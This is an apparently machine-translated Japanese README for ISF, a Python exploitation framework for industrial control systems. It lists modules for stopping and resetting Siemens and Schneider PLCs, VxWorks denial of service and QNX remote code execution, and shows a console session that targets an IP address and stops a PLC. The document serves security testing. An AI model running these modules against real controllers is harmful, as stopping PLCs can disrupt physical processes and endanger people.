ある
ve release
ISF(Industrial Exploitation Framework) は、Python をベースにした搾取フレームワークであり、metasploit フレームワークに似ています。
ISF は、オープンソース プロジェクトの routersploit に基づいています。
他の言語で読む: 英語、简体中文、
事前の相互同意なしにターゲットを攻撃するために ISF を使用することは違法です。適用されるすべての地方法、州法、および連邦法に従うのはエンドユーザーの責任です。開発者は、このプログラムによって引き起こされるいかなる誤用または損害についても責任を負いません。
名前 | パス | 説明 |
---|---|---|
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP クライアント |
wdb2_クライアント | icssploit/clients/wdb2_client.py | WdbRPC バージョン 2 クライアント(Vxworks 6.x) |
s7_クライアント | icssploit/clients/s7_client.py | s7commクライアント(S7 300/400 PLC) |
名前 | パス | 説明 |
---|---|---|
s7_300_400_plc_control | エクスプロイト/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC スタート/ストップ |
s7_1200_plc_control | エクスプロイト/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC スタート/ストップ/リセット |
vxworks_rpc_dos | エクスプロイト/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC リモート dos(CVE-2015-7599) |
quantum_140_plc_control | エクスプロイト/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 シリーズ PLC スタート/ストップ |
crash_qnx_inetd_tcp_service | エクスプロイト/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP サービスの機能 |
qconn_remote_exec | エクスプロイト/plcs/qnx/qconn_remote_exec.py | QNX qconn リモート コード実行 |
profinet_set_ip | エクスプロイト/plcs/siemens/profinet_set_ip.py | Profinet DCP デバイスの IP 構成 |
名前 | パス | 説明 |
---|---|---|
profinet_dcp_scan | スキャナー/profinet_dcp_scan.py | プロフィネット DCP スキャナ |
vxworks_6_scan | スキャナー/vxworks_6_scan.py | Vxworks 6.x スキャナー |
s7comm_scan | スキャナー/s7comm_scan.py | S7commスキャナ |
enip_scan | スキャナー/enip_scan.py | イーサネットIPスキャナ |
これらのプロトコルは、Kitty などの他のファジング フレームワークで使用したり、独自のクライアントを作成したりできます。
名前 | パス | 説明 |
---|---|---|
pn_dcp | icssploit/プロトコル/pn_dcp | Profinet DCP プロトコル |
modbus_tcp | icssploit/プロトコル/modbus_tcp | Modbus TCP プロトコル |
wdbrpc2 | icssploit/プロトコル/wdbrpc2 | WDB RPC バージョン 2 プロトコル |
s7comm | icssploit/プロトコル/s7comm.py | S7commプロトコル |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ | | / __ _ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | ___ \___ | ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|__________|_____/_____/|_| |__________/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
Tab キーを使用して入力を完了することもできます。
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >